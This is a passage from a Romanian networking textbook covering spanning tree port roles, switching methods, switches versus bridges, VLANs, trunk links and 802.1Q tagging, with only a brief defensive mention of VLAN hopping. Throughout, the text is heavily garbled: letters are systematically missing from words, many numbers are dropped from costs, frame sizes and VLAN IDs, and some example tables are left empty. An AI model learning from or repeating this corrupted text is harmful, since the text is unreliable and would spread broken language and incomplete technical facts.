ădă i ă, este ales po tul a e a e el ai s ăzut ost al ăii sp e ădă i ă, u â d a a est
po t să fie a at a po t ădă i ă.
Ultimul pas din co st u ţia a o elui de a ope i e p esupu e dete i a ea po tu ilo
a ti e. U po t a ti este u po t e t i ite şi e epţio ează t afi , î e e e u po t i a ti
este trecut în starea blocat.
Odată sta ilite po tu ile ădă i ă, t e uie ide tifi ate, pe de o parte, conexiunile ce fac
parte dintr-o ale opti ă ăt e s it hul ădă i ă de i a e au la u ul di t e apete u po t
a at a po t ădă i ă , şi, pe de altă pa te, ele e u apa ţi di a o ele de a ope i e de i
conexiunile care trebuie întrerupte).
Î p i ul az etoda este e ide tă: toate po tu ile e fa pa te di t -o ale opti ă şi u
su t deja a ate a po tu i ădă i ă su t a ate d ept po tu i a ti e.
72 | ‘ e ţ e l e L o a l e
Î el de al doilea az t e uie fă ută o o pa aţie î t e ele două po tu i e defi esc

o e iu ea edu da tă. Mai î tâi su t o pa ate ostu ile elo două po tu i; da ă a estea
sunt egale, factorul decisiv este identificatorul switchului: portul de pe switchul cu
ide tifi ato ul el ai i u p io itatea ea ai i ă sau î azul î a e p io ităţile su t
egale, u ad esa MAC ea ai i ă de i e po t a ti , î e e e po tul u ide tifi ato ul ai
a e este a at a i a ti şi este t e ut î sta ea lo at.
Fie eţeaua di figu ă. “e o u ă i pe t u a eastă eţea u două u le etapele construirii
arborelui de acoperire.
2-10: Construirea arborelui de acoperire
P i a î t e a e este: a e este ădă i a a o elui de a ope i e? Pe t u a easta su t

o pa ate p io ităţile elo s it hu i. Î azul eţelei de ai sus po i de la p e isa ă
toate s it hu ile su t p oduse de a elaşi fa i a t şi î plus su t a ia s oase di utie. Altfel
spus, toate s it hu ile au a eeaşi p io itate. Î a est az t e uie o pa ate ad esele fizi e.
Swit hul u ad esa MAC ea ai i ă este A. Astfel A de i e ădă i a a o elui de
acoperire.
La pasul al doilea t e uie sta ilite pe t u estul s it hu ilo ostu ile po tu ilo e ofe ă
ăi sp e s it hul ădă i ă. Pe t u o legătu ă Ethernet costul e 100, pentru una FastEthernet e
19, iar pentru una GigaEthernet e 4; prin urmare:
B-Root: 19
B-C-D-Root: 42
B-C-D-E-B-Root: 176
C-B-Root: 38
C-D-Root: 23
C-D-E-B-Root: 157
D-Root: 4
D-C-B-Root: 57
D-E-B-Root: 138
E-B-Root: 119
E-D-Root: 23
E-D-C-B-Root: 76
Conexiunile ce fac parte din arborele de acoperire sunt: B-A, C-D-A, D-A şi E-D-A, astfel
su t a ate d ept po tu i ădă i ă ele pat u po tu i o espu zătoa e a esto o e iu i de
pe s it hul B po tul e fa e pa te di legătu a B-A, etc.)
În pasul al treilea trebuie stabilite porturile active pentru legătu ile B-E şi B-C.
Pentru conexiunea B-E, costul portului de pe switchul B este 19, în vreme ce costul
portului de pe E este 23. Prin urmare portul de pe B va fi marcat ca port activ, iar portul de pe
E va fi marcat ca non-designated sau inactiv. În mod similar, pentru conexiunea B-C, portul de
pe switchul B va fi activ, având un cost de 19, iar portul de pe C va fi trecut în starea blocat,
fiind un port non-designated.
P
P
P
9
P
P
P
2-11: Co figurația fi ală
2.2.4 Metode de comutare

E istă două etode de o uta e a pa hetelo : o utare dire tă (cut through şi
o utare după sto are (store and forward).
Metoda de o uta e după sto a e se azează pe e epţio a ea î t egului ad u î ai te
de a începe retransmisia acestuia. Late ţa a estei etode eşte odată u di e siu ea
â pului de date. Cu toate a estea, pe fo a ţele etodei de o uta e după sto a e pot fi
supe ioa e elo ofe ite de o uta ea di e tă, ai ales î azul li iilo e puse u o
i te fe e ţe pute i e. Me a is ele de dete ţie a e o ilo pe a e le ofe ă a eastă etodă
pe it asigu a ea u ei o e iu i sigu e la i elul legătu ă de date.
Metoda de o uta e după sto a e pu e şi p o le a asigu ă ii e o iei pe t u sto a ea
cadrelor. Fie exemplul unui switch u de po tu i. A esta t e uie să poată gestio a
o u i aţii si ulta e, a e î el ai defa o a il az posi il o t a sfe a ad e de lu gi e
a i ă. Se ajunge astfel la o di e sio a e a e o iei ‘AM e esa ă pe t u sto a ea
cadrelor de aproape 18 kB. Deşi di e sio a ea e o iei ‘AM folosite pe t u sto a ea
ad elo u este p i ipalul fa to de sta ili e a p eţului u ui s it h, u t e uie o is faptul ă
p eţu ile pe t u e o iile dispoziti elo dedi ate su t de âte a o i ai idi ate de ât ele
pentru memoriile folosite în calculatoarele personale.
Co uta ea di e tă p esupu e a dispoziti ul de i te o e ta e să î eapă t a s ite ea
ad ului pe po tul desti aţie i ediat e ad esa desti aţie a fost t e ută p i ta ela de
o uta e şi i te faţa de ple a e a fost dete i ată. Cel ai adesea se î tâ plă a t a s isia
ad ului să î eapă î ai te de e epţio a ea i teg ală a ad ului. Astfel s it hul p i eşte pe
u a di t e i te feţe o teţi e o pu ad ul, t a s iţâ d î a elaşi ti p pe po tul desti aţie
o teţii di a elaşi ad u p i iţi ai de e e.
74 | ‘ e ţ e l e L o a l e
Pe t u o uta ea di e tă u este e esa ă i i ă a e epţio a ea i teg ală a a tetului

ad ului, ad esa desti aţie fii d sufi ie tă. A eastă etodă se u eşte o utare dire tă
rapidă (fast forward şi ofe ă o late ţă de ap o i ati de i ose u de. Dato ită faptului
ă et a s isia ad ului î epe i ediat după iti ea ad esei desti aţie, ad ele e o ate o fi
t a s ise u e o i. Deşi a este ad e su t espi se la i elul legătu ă de date al desti aţiei de
ăt e pla a de eţea , t afi ul ge e at de et a s isia lo poate, î azul u ui ediu de
t a s isie u ulte e o i, să du ă la o dep e ie e se e ă a pe fo a ţelo eţelei.
Al doilea tip de o uta e di e tă este o utarea fără frag e te (fragment free). În
a eastă etodă de o uta e f ag e tele de ad e ezultate î u a u ei oliziu i su t
filtrate. Într-o eţea e espe tă spe ifi aţiile sta da dului Ethernet dimensiunea fragmentelor
de oliziu i u poate depăşi de o teţi. Î azul o ută ii fă ă f ag e te, s it hul de ide ă
şi ul de o teţi e epţio aţi u fa e pa te di t -u f ag e t ezultat î u a u ei oliziu i şi
a ia apoi î epe et a s isia pe po tul desti aţie. Late ţa î a est az este de i i ,
i ose u de, ti pul e esa e epţio ă ii a de o teţi.
2.2.5 Switch vs. Bridge

Care sunt diferenţele dintre un switch şi un bridge?
Cele ai i po ta te două dife e ţe di t e u s it h şi u idge se efe ă la etodele de
o uta e ofe ite şi la p oie ta ea backplain-ului.
Faţă de bridge-uri, swit hu ile i ple e tează î ge e al etode de o uta e ai apide.
În general bridge-urile, deşi u su t i te esate de dete ţia u ui u ă ât ai a e de e o i,
i ple e tează doa o uta ea după sto a e. A eastă p a ti ă este e pli a ilă ai deg a ă
p i aţiu i isto i e, efii d ezultatul u ei de izii de opti iza e a t afi ului î eţea.
Cea de a doua dife e ţă se efe ă la apa itatea s it hurilor de a permite mai multe
o u i aţii si ulta e, fă ă a s ădea lăţi ea de a dă alo ată fie ă eia di t e o e iu i. Spre
deose i e de u s it h, o pu te a a ea o apa itate de o uta e i te ă backplain)
ap o i ati egală u iteza po tu ilor. Altfel spus, în cazul unui bridge cu 4 porturi de 10 Mbps,
pe t u o si gu ă o e iu e lăţi ea de a dă dispo i ilă a fi de M ps, da î azul i iţie ii
a două o e iu i si ulta e staţia de pe po tul o u i ă u ea de pe po tul şi î a elaşi
ti p staţia de pe po tul o u i ă u ea de pe po tul , fie a e di t e ele două o e iu i
a a ea o a dă dispo i ilă de Mbps.
Cele două dife e ţe di t e s it hu i şi idge-uri sunt în fapt avantaje importante ale
s it hu ilo , ia p eţul u ui s it h este foa te ap opiat de el al u ui idge. Cu toate a estea
se mai produc bridge-u i şi î ziua de azi.
E istă u az î a e ele două a a taje ale s it hu ilo îşi pie d ele a ţa. Este o a
desp e i te o e ta ea a două eţele e foloses p oto oale de i el dife ite. Î a est az
si gu a etodă de o uta e posi ilă este store-and-forward, deoarece cel mai adesea cadrele
t e uie eî pa hetate, dato ită dife e ţelo de di e siu e a i ă a ad ului, da şi dato ită
dife e ţelo de fo at a a tetelo . Î plus, pe t u i te o e ta ea a două eţele u p oto ol
de i el legătu ă de date dife it se foloseşte î ge e al u dispozitiv dedicat, astfel încât
backplain-ul dispoziti ului să u t e uias ă să fa ă faţă la ai ult de o o e iu e la u
moment dat.
Că ui fapt i se dato ează a iaţia de p eţ î t e s it hu i?
Nu ă ul de po tu i este u ul di fa to ii e dete i ă p eţul u ui s it h. E istă u ost
ediu pe po t, a est ost a ii d î fu ţie de iteză şi de p odu ăto . De e e plu, ostul
pentru un port Ethernet se situează î t e şi $.
Pe de altă pa te, dato ită u ă ului a e de se i ii pe a e le poate ofe i u s it h, de la
si pla o uta e de pa hete pâ ă la ula ea “TP sau hia a “NMP, p eţu ile s it hu ilo
a iază e t e de ult. Astfel, da ă u s it h u po tu i fă ă nicio fa ilitate supli e ta ă

poate să oste su $, u s it h apa ţi â d a eluiaşi p odu ăto , dar oferind un
a age e t a a sat şi posi ilitatea i se ă ii de oi odule poate să aju gă la $.
2.3 Reţele locale virtuale

După u s-a ăzut î se ţiu ea anterioară, folosirea switchurilor într-o eţea Ethernet are
ca efect segmentarea acesteia în domenii de coliziune individuale, neavând niciun efect asupra
do e iului de difuza e. A est lu u î sea ă ă toate odu ile di eţea pot să adă
broadcast-ul trimis de un nod al unui segment.
O a a te isti ă i po ta tă a o ută ii î eţelele Ethernet o reprezi tă a ilitatea de a
crea LAN-uri virtuale (VLAN – Virtual LAN . Co eptul de eţea i tuală a fost sta da dizat de
ăt e o itetul IEEE , fii d utilizat î ziua de azi de ulte o ga izaţii. U VLAN ep ezi tă
o g upa e logi ă a staţiilo /utilizato ilo şi e hipa e telo de eţea, fă ă nicio est i ţie asup a
segmentului fizic din care fac parte. VLAN-u ile seg e tează o eţea o utată, ţi â d sea a
de o ga iza ea î e hipe de lu u sau de apli aţii şi u de ite ii geog afi e. Altfel spus, o
eţea lo ală i tuală poate fi p i ită a u do e iu logi de oad ast defi it de o ulţi e de
switchuri.
Traficul între VLAN-u i este est i ţio at. “ it hu ile t a s it t afi de tip unicast,
multicast şi broadcast u ai pe seg e tele de eţea e fa pa te din VLAN-ul de a e apa ţi .
Cu alte cuvinte nodurile dintr-u VLAN o u i ă u ai u odu ile di a elaşi VLAN. Pe t u
comunicare între VLAN-u i dife ite este e oie de u dispoziti de i el t ei, şi a u e u
router.
De ce este nevoie de VLAN-uri?
Marele a a taj o ţi ut prin introducerea switchurilor într-o eţea Ethernet o stă î
crearea domeniilor de coliziune independente pentru fiecare port al switchului. Dar, cu fiecare
pas, apar noi probleme – u ât su t ai ulţi utilizato i şi/sau ai ulte s it huri, cu atât
u ă ul broadcast-u ilo a fi ai a e. Altfel spus, pe ăsu ă e di e î e ai ulte
eţele lo ale su t i te o e tate, u ă ul ad elo de broadcast e epţio ate de fie a e staţie
ti de să eas ă li ia u u ă ul de staţii.
2-12: Topologie cu trei domenii de broadcast
Toate echipamentele dintr-u VLAN su t e e ale a eluiaşi do e iu de broadcast,

e epţio â d astfel toate broadcast-urile. Toate cadrele de broadcast sunt filtrate de toate
76 | ‘ e ţ e l e L o a l e
porturile unui switch ce nu sunt în VLAN-ul espe ti . A esta este u a a taj deoa e e ofe ă
toate e efi iile pe a e le ofe ă o eţea o utată, da fă ă deza a tajele de a a ea toţi
utilizatorii într-un singur domeniu de broadcast. Cu ajutorul VLAN-u ilo pute o t ola uşo
ă i ea do e iilo de oad ast prin: controlul dimensiunii totale a VLAN-urilor sale;
est i ţio a ea u ă ului de po tu i pe s it h î ad ul u ui VLAN; est i ţio a ea u ă ului
de utilizatori ce folosesc aceste porturi.
O altă p o le ă o ep ezi tă se u itatea. Î ad ul u ei eţele Ethernet comutate toate
staţiile pot edea toate elelalte staţii şi u e istă o politi ă de op i e a broadcast-urilor trimise
de staţii sau de op i e a ăspu su ilo utilizato ilo la ele. O i e pla ă de eţea poate fi setată
într-un mod transparent (promiscuous , opii d tot t afi ul e soseşte pe a alul de
o u i aţie.
Astfel, prin crearea VLAN-u ilo şi a do e iilo de broadcast separate, administratorii pot
a ea o t ol asup a fie ă ui po t şi asup a fie ă ui utilizato . )ilele â d utilizato ii puteau să
se o e teze â d do eau u staţia aflată la o i a e di po tu ile u ui s it h, o ţi â d a es la
esu se, a t e ui să fie isto ie de ult, deoa e e ad i ist ato ul a e o t olul asup a
porturilo şi asup a esu selo e se pot a esa p i a ele po tu i. Deşi VLAN-urile sunt create
î o o da tă u esu sele de a e u utilizato a e e oie, s it hu ile pot fi o figu ate să
i fo eze staţiile de a age e t î legătu ă u o i e a es eauto izat sesizat. Ia da ă se
do eşte şi o u i a e î t e VLAN-u i se pot i ple e ta est i ţii pe router pe t u a o ţi e u
nivel înalt de securitate.
VLAN-u ile ofe ă u g ad a e de fle i ilitate şi s ala ilitate. Prin implementarea lor se
eează do e ii de broadcast ai i i. Asta î sea ă ă broadcast-urile trimise de un nod
dintr-u VLAN u o aju ge pe po tu ile o figu ate î alt VLAN. Aşa ă, p i at i ui ea
po tu ilo sau utilizato ilo u ui VLAN pe u s it h, se âştigă fle i ilitatea de a adăuga u ai
pe acei utilizatori pe care îi dorim în domeniul de broadcast espe ti . A eastă a o da e poate
fu ţio a şi pe t u lo a ea broadcast storm-urilor auzate de o pla ă de eţea defe tă, ât şi
pentru prevenirea unui echipament intermediar de a le propaga î toată eţeaua. A este
broadcast storm-uri se pot î tâ pla şi î ad ul u ui VLAN, da ele o fi eduse u ai la
VLAN-ul din care au pornit.
VLAN-urile impun o mai mare scalabilitate într-o eţea o utată. Câ d u VLAN de i e
prea mare, se pot crea alte VLAN-uri, oprind astfel broadcast-u ile să afe teze lăţi ea de
a dă a eţelei – u ât su t ai puţi i utilizato i î t -u VLAN, u atât u ă ul broadcast-
u ilo este ai i . T e uie î să ţi ut o t î od spe ial, â d este o a de p oie ta ea u ei
reţele u VLAN-u i, de se i iile dispo i ile î eţea şi t e uie î ţeles e a is ul o e tă ii
utilizatorilor la aceste resurse.
U alt a a taj pe a e îl ofe ă VLAN-u ile este i pa tul spo it asup a pe fo a ţei eţelei.
Putem grupa utilizatorii ce foloses apli aţii i te si e de eţea î t -un VLAN separat. De
e e plu, pute ea u VLAN sepa at pe t u u teh i ia e testează o apli aţie ulti ast şi
pe t u se e ele pe a e a esta le foloseşte. A esta se a u u a de ti pi de ăspu s foa te
buni din partea esu selo pe a e le utilizează, fii d î t -u „LAN dedi at , î ti p e î t egul
depa ta e t teh i u îşi a ai e p i a e ulţu i ea î legătu a u s ăde ea atei de
t a sfe a fil ului pe a e aşteaptă să îl do loadeze, deoa e e î t eaga apli aţie este izolată
într-un VLAN separat.
VLAN-u ile uşu ează gestio a ea ig aţiilo , adăugă ilo şi a s hi ă ilo di eţea –
network management. Prin intermediul software-ului de pe s it h se pot adăuga utilizato i
într-un VLAN, iar mai târziu li se poate s hi a apa te ţa î t -un altul. Recablarea pentru
asigu a ea o e ti ităţii u ai este e esa ă î t -o eţea o utată deoa e e tool-urile de
a age e t ale eţelei pe it e o figu a ea logi ă a sa î doa âte a se u de.
2-13: VLAN segmentat pe departamente
Figu a de ai jos a ată u şase VLAN-uri (numerotate de la 2 la 7) au fost folosite pentru

a crea un domeniu de broadcast pe t u fie a e depa ta e t. Fie ă ui po t al s it hului îi este
atribuit câte u VLAN, depi zâ d de staţia şi do e iul de broadcast î a e t e uie să fie
aceasta.
A u da ă se do eşte adăuga ea u ei oi staţii î VLAN-ul de Vâ ză i VLAN , se at i uie
portul respectiv VLAN-ului , i dife e t de lo aţia fizi ă a oului utilizato . A easta ilust ează
u ul di t e a a tajele i po ta te ale p oie tă ii u ei eţele u VLAN-u i, şi a u e efle ta ea
st u tu ii o ga izato i e ai deg a ă de ât a st u tu ii fizi e.
2-14: Utilizarea VLAN-urilor
Marketing VLAN2 172.16.2.0/24

Dist i uţie VLAN3 172.16.3.0/24
Tehnic VLAN4 172.16.4.0/24
Fi a ţe VLAN5 172.16.5.0/24
Management VLAN6 172.16.6.0/24
Vâ ză i VLAN7 172.16.7.0/24
78 | ‘ e ţ e l e L o a l e
De e a at faptul ă î figu ă VLAN-u ile î ep să fie u e otate de la VLAN . O i u

u ă ul este i ele a t, da e s-a întâmplat cu VLAN 1? Acest VLAN este un VLAN
administrativ, recomandându-se a fi folosit în acest scop. VLAN 1 nu poate fi şte s sau
odifi at şi i pli it, toate po tu ile de pe u s it h fa pa te di a est VLAN, pâ ă la o ouă
atribuire.
Fie a e VLAN fii d o side at u do e iu de oad ast sepa at, t e uie să ai ă u u ă
de eţea, p i a e este ide tifi at. Fie a e staţie di t -un VLAN nu poate comunica decât cu o
staţie di VLAN-ul espe ti , astfel ă, pe t u o u i aţia î t e VLAN-uri, este necesar un
oute sau u dispoziti de i el , aşa ă u e de aşteptat a oute ele să dispa ă p ea u â d!
Implementarea unui VLAN pe u s it h i pli ă u ătoa ele a ţiu i:
 s it hul e ţi e o ta elă de o uta e sepa ată pe t u fie a e VLAN;
 da ă u ad u aju ge la s it h pe po tul e se află î t -u VLAN oa e a e, s it hul aută
tabela de comutare pentru VLAN-ul respectiv;
 când cad ul este p i it, s it hul adaugă î ta ela de o uta e ad esa su să a ad ului
e epţio at da ă a easta este e u os ută;
 s it hul aută desti aţia pe t u a şti e de izie t e uie să ia;
 pentru partea de learning şi forwarding, ăuta ea este fă ută î tabela de comutare a VLAN-
ului respectiv.
2.3.1 Tipuri de VLAN-uri

VLAN-u ile su t de o i ei eate a ual de ăt e u ad i ist ato , e at i uie apoi
porturilor de pe switch câte un VLAN. Aceste VLAN-uri se numesc VLAN-uri statice. VLAN-urile
statice sunt cele mai des folosite în ziua de azi, având numeroase avantaje cum ar fi:
se u itatea idi ată, uşu i ţa de o figu a e, si plitatea o ito iză ii, fu ţio a ea u ă î
eţele î a e a ţiu ile su t o t olate şi ad i ist ate. Po tu ile îşi e ţi o figu aţiile VLAN
at i uite pâ ă â d a estea su t s hi ate a ual. Câ d o staţie este o e tată la u po t al
switchului, aceasta va face parte din VLAN-ul configurat pe portul respectiv.
În figura de mai sus, fiecare port al switchurilor a fost configurat manual cu câte un VLAN,
î fu ţie de VLAN-ul î a e fie a e staţie t e uia să se afle – lo aţia fizi a a staţiei u
o tează. De a i tit faptul ă fie a e staţie t e uie să ai ă o ad esă logi ă de i el t ei
o siste tă. De e e plu, fie a e staţie e apa ţi e VLAN-ului t e uie o figu ată u o ad esă
IP di eţeaua . . . / . De eţi ut faptul ă î ai te de a o e ta o staţie î t -un port al
u ui s it h, t e uie e ifi ată o figu aţia po tului, pe t u a e ifi a di e VLAN fa e pa te.
Da ă VLAN-ul respecti este dife it faţă de VLAN-ul î a e t e uia staţia să se afle, atu i
staţia a î tâ pi a p o le e de a esa e a esu selo lo ale VLAN-ului.
VLAN-urile dinamice dete i ă apa te e ţa u ui od la u VLAN auto at, folosi d
managementul centralizat al apli aţiilo pe VLAN-u i. Deşi ad i ist a ea este ai si plă î
centrele de cablare (wiring closet), VLAN-urile dinamice sunt mai rar folosite decât cele statice.
Apa te e ţa la u VLAN di a i se azează pe ad esa fizi ă MAC , ad esa logi ă sau tipul de
protocol.
De exemplu, se poate presupune ă ad esele fizi e au fost i t oduse o e t î t -o ază de
date, e o ţi e o espo de ţe <ad esa MAC – VLAN> şi se află pe u se e de o figu at
VLAN-u i. Da ă u od este ataşat u ui po t de pe s it h, e o figu at în niciun VLAN, se va
ăuta î aza de date ad esa MAC a odului şi da ă a easta a fi găsită, po tul î a e a fost
o e tat odul a fi o figu at şi i se a at i ui VLAN-ul espe ti . “iste ul dispu e şi de u
mecanism de semnalizare când un utilizato e u os ut se adaugă la eţea ad esa MAC u
este o figu ată pe se e .
2.3.2 Legături acces/trunchi

Switchurile într-o eţea Ethernet t e uie să gestio eze toate tipu ile de ad e şi, î plus, să
î ţeleagă e să fa ă u a estea, azâ du-se pe adresa MAC. Teh ologia pusă la dispoziţie de
VLAN-u i ofe ă posi ilitatea g upă ii po tu ilo şi a utilizato ilo î g upu i logi e, g upa e e
i pli ă folosi ea ai ulto s it hu i, pa taja ea a eleiaşi lădi i sau a ai ulto lădi i sau
chiar WAN-uri. Pentru orice a hite tu ă VLAN, i po ta tă este posi ilitatea t a sfe ului de
i fo aţie î t e staţii, s it hu i şi routere.
E istă două tipu i de legătu i î t -o eţea azată pe s it hu i Ethernet: legătu i de a es şi
legătu i de t u hi.
O legătură de a es reprezintă o legătu ă pe s it hul e este e u î t -un singur VLAN
şi este de u ită „VLAN-ul ati al po tului. O i e od o e tat p i t -o legătu ă de a es u
este o ştie t de apa te e ţa sa la eu VLAN – odul p esupu e ă fa e pa te di t -un
domeniu de b oad ast, e u os â d aspe tul fizi al eţelei.
“ it hu ile î lătu ă o i e i fo aţie desp e VLAN-u i, e a putea fi o ţi ută î t -un
ad u, î ai te a a esta să fie pus pe o legătu ă de a es. “taţiile de pe legătu ile de a es u
pot o u i a u staţiile din alt VLAN, comunicarea realizându-se u ai da ă pa hetul este
rutat.
2-15: Legături a es/tru hi
O legătură de tru hi este apa ilă să supo te ai ulte VLAN-u i, de o i ei fii d folosită
pentru a conecta switchurile de alte switchuri sau de routere. O legătu ă de t u hi poate fi
p i ită a o autost adă, pe a e i ulă aşi i e t e uie să aju gă fie a e la desti aţii dife ite.
O legătu ă de t u hi u apa ţi e u ui VLAN spe ifi , espo sa ilitatea a esteia fii d să
a ţio eze a şi o e iu e pe t u VLAN-u i î t e s it hu i şi routere. Poate fi o figu ată
pentru a transporta toate VLAN-u ile sau u ai u u ă li itat de VLAN-u i. Da ă legătu a
î t e s it hu i u este o figu ată d ept legătu ă de trunchi, atunci implicit, numai
i fo aţiile VLAN-ului o fi s hi ate pe a eastă legătu ă. O legătu ă de t u hi poate a ea
u VLAN ati , a esta fii d folosit da ă legătu ă de t u hi edează, di t -un motiv oarecare.
2.3.3 Metode de identificare

După u s-a observat mai sus, VLAN-u ile pot fi eate să se e ti dă pe o ulţi e de
s it hu i, s it hu ile fii d o e tate î t e ele p i legătu i de t u hi. Î să, p o le a a e
apare acum – hia şi pe t u u s it h – este cum va gestiona acesta cadrele schimbate pe
legătu a de t u hi şi u ide tifi ă VLAN-ul de a e apa ţi e u ad u?
Co eptul e a fost i t odus se azează pe asig a ea de ăt e s it h a u ui ide tifi ato
u i fie ă ui ad u, ide tifi ato e ep ezi tă VLAN-ul din care face parte (VLAN ID). A eastă
etodă de odifi a e a ad elo p i ite de s it h poa tă u ele de frame tagging. Fiecare
80 | ‘ e ţ e l e L o a l e
s it h e p i eşte u ad u, o ţi â d u a aj de VLAN tag , t e uie ai î tâi să ide tifi e

ide tifi ato ul de VLAN VLAN ID , după a e s it hul se uită în tabela de filtrare pentru a lua o
de izie. Da ă s it hul e a p i it ad ul a e u ai o legătu ă de t u hi, atu i ad ul a fi
t i is pe a easta. Î să, o dată e u ad u t e uie să aju gă pe o legătu ă de a es, se e ifi ă
identificatorul de VLAN cu VLAN-ul e se află pe a ea legătu ă, ia da ă a estea o espu d,
s it hul î lătu ă VLAN ID-ul şi t i ite ad ul pe a el seg e t de eţea.
“ opul p i a al etodelo de t u hie e este a ela de a asigu a o u i aţia î t e
switchuri, într-o a hite tu ă azată pe VLAN-u i. Cis o a eat I“L, a esta fu ţio â d u ai
î t e e hipa e te Cis o. Da ă se do eşte un protocol de trunchiere ce nu este proprietar, se
va folosi IEEE . Q. Î ele e u ează, va fi analizat standardul 802.1Q, metoda de
trunchiere ISL e ai fii d supo tată pe i io platfo ă Cis o Catal st.
802.1Q ep ezi tă sta da dul IEEE pe t u a a ea ad elo frame tagging) ce
t a e sează o legătu ă de t u hi. Fii d u sta da d IEEE, a est p oto ol poate fi folosit u
uşu i ţă î t e e hipa e tele e p o i de la dife iţi p odu ăto i. . Q u î apsulează
ad ul o igi al, i î s hi , i se ează u â p de o teţi î a tetul ad ului Ethernet original,
e al ulâ d su a de o t ol FC“ , î ai te a a esta să fie t i is pe o legătu ă de t u hi.
O e headul pe a e a est p oto ol îl i t odu e este de o teţi, eea e du e la o lu gi e
a i ă a ad ului Ethernet de de o teţi.
Câ pul de o teţi, i se at î t e â pu ile Ad esă “u să şi Lu gi e/Tip, este fo at di
două pă ţi: p i ii o teţi i di ă ide tifi ato ul p oto olului VLAN, e a e î totdeau a aloa ea
, ia u ăto ii o teţi o ţi t ei â pu i. “u -câmpul cel mai important este
ide tifi ato ul de VLAN, e o upă ei ai puţi se ifi ati i iţi, eea e i di ă faptul ă o
legătu ă de t u hi e utilizează p oto olul . Q poate supo ta pâ ă la de VLAN-uri.
Câmpul Prioritate (Priority de iţi se efe ă la sta da dul IEEE . p, de p io itate a
t afi ului. A est â p fa e disti ţia î t e t afi ul î ti p eal i ple e tat ha d şi el
i ple e tat soft şi de t afi ul i te s pe t u o ai u ă alitate a se i iilo î Ethernet.
1 6 6 2 46-1500 4
Preambul Lungime/Tip Date
2-16: Structura cadrului Ethernet 802.3
1 6 6 4 2 46-1500 4
Preambul TAG Lungime/Tip Date
2-17: Structura cadrului 802.1Q
2B 3b 1b 12b
Identificator protocol
Prioritate CFI VLAN ID
(0x8100)
2-18: Structura câmpului TAG
Câmpul CFI (Canonical Format Indicator de it e a folosit să i di e ad esele MAC î

format Little Endian sau Big Endian. În prezent este un flag pe t u a u ţa ea e iste ţei u ui
cadru prestabilit 802.5 (Token Ring).
Notă: Ce t e uie e a at este faptul ă a eastă etodă de t u hie e i t odu e o
sup aî ă a e de o teţi ad ului Ethernet. Deoarece cadrele Ethernet u t e uie să fie ai
mari de 151 o teţi, i fo aţia adiţio ală e este adăugată a ea ad e e depăşes
lu gi ea a i ă ad isi ilă. A estea su t de u ite ad e „ a gia t , switchurile

apo tâ d astfel de ad e d ept e o i sau ad e p ea a i. Pe t u a ezol a a eastă p o le ă,
switchu ile t e uie să î ţeleagă sta da dul IEEE . a , e e ti de lu gi ea a i ă a
cadrului Ethernet la o teţi.
“ta da dul . Q i t odu e o eptul de VLAN ati . Cad ele e apa ţi a estui VLAN u
su t odifi ate â d su t t a spo tate pe o legătu ă de trunchi. VLAN-urile native mai sunt
cunoscute sub numele de VLAN-u i de a age e t. Câ d se o figu ează . Q pe o
legătu ă de t u hi, t e uie configurat a elaşi VLAN ati î a ele pă ţi ale t u hiului.
Implicit, VLAN-ul nativ este VLAN 1, iar toate porturile sunt în acest VLAN când switchul este
pornit.
VLAN-ul ati este utilizat pe t u tot t afi ul e a at p i it pe o legătu ă t u hi,
o figu ată u . Q. A eastă opţiu e este do ită î spe ial u ai pe t u a asigu a
o u i aţia di e tă, fă ă odifi a ea ad elo , î t e po tu ile apa ile de . Q şi ele ai
e hi . . Totuşi, î toate elelalte azu i, poate de e i foa te dău ătoa e VLAN hopping),
deoarece cadrele asociate cu VLAN-ul ati îşi pie d u u ai a ajul, ide tifi ato ul, i şi
lasa de p io itate iţii de p io itate â d su t t a spo tate pe o legătu ă . Q. Di a este
motive – pie de ea ijloa elo de ide tifi a e şi de lasifi a e – folosirea VLAN-ului nativ ar
t e ui e itată. Î azu ile î a e a est lu u u poate fi fă ut, î totdeau a se alege un VLAN
nefolosit, diferit de cel implicit, pentru VLAN-ul ati al tutu o legătu ilo t u hi.
Pe t u a e e plifi a lu u ile e ţio ate pâ ă a u , se o side ă figura de mai jos.
“taţia A e se află o e tată pe po tul A al s it hului “ , do eşte să t i ită u pa het
staţiei B, e se află o e tată pe po tul B al s it hului “ . Legătu ile de t u hi au VLAN-
u ile ati e o figu ate astfel: legătu a di t e “ şi “ este o figu ată u VLAN ati , ia
legătu a di t e “ şi “ este o figu ată u VLAN ati . A ele staţii de află î VLAN .
2-19: Folosirea VLAN-ului nativ
Î ai te de des ie ea efe ti ă a ad elo e su t t i ise î t e ele două staţii, u este

o ga izată ta ela de o uta e a s it hului “ ? A easta a fi o ga izată pe se ţiu i sepa ate
pe t u fie a e VLAN. Cu alte u i te, fie a e aso ie e di ta ele de o uta e, pe lâ gă
perechea <adresa_MAC-po t>, a a ea spe ifi at şi VLAN-ul ă uia îi apa ţi e.
VLAN I te faţă/po t Ad esă MAC
200 A MAC A
300 C MAC C
200 D MAC B
2-20: Tabela de comutare a switchului S1
82 | ‘ e ţ e l e L o a l e
După e staţia A află toate i fo aţiile e esa e pe t u o st ui ea pa hetului de date, îl

t a s ite, a esta aju gâ d pe po tul A al s it hului “ . “ it hul “ iteşte ad esa MAC
desti aţie şi e ifi ă ta ela de o uta e pe t u o e e tuală aso ie e. Aşa u se o se ă şi î
tabelul de mai sus, pachetul va trimis pe portul D al switchului S1. Dar, înainte de trimiterea
pa hetului, “ a t e ui să adauge i fo aţia de i el doi VLANID , pe aza ă eia s it hul “
a şti ă ui VLAN să t i ită ad ul. “e o se ă, a da ă VLAN-ul nativ este diferit de VLAN-ul
di a e fa e pa te staţia e t a s ite, s it hul e p i eşte ad ul a t e ui sa adauge
identificatorul de VLAN pentru pachetul respectiv. Când pachetul este primit de switchul S2,
a esta a u a a eeaşi paşi de de izie, î s hi , a o se a ă VLAN-ul ati al legătu ii de
trunchi pe care t e uie să t a s ită ad ul este a elaşi u el al staţiei e a t a s is ad ul
espe ti staţia A . Î u a a estui lu u, ide tifi ato ul de VLAN este şte s şi pa hetul este
t i is s it hului “ , e îl a t i ite ai depa te staţiei B.
Succesiunea de pachete este u ătoa ea:
De la staţia A la s it hul “ :
MAC desti aţie MAC su să Lungime/Tip Date CRC
MAC B MAC A 0x0800 X X
De la switchul S1 la switchul S2:

MAC B MAC A 0x8100 200 0x0800 X X
De la switchul S2 la switchul S3:

De la s it hul “ la staţia B:
2.4 Rutare între VLAN-uri

“taţiile di t -un VLAN fac parte din domeniul de broadcast definit de VLAN-ul respectiv,
putând comunica între ele. VLAN-u ile pa tiţio ează eţeaua şi sepa ă traficul de nivel doi,
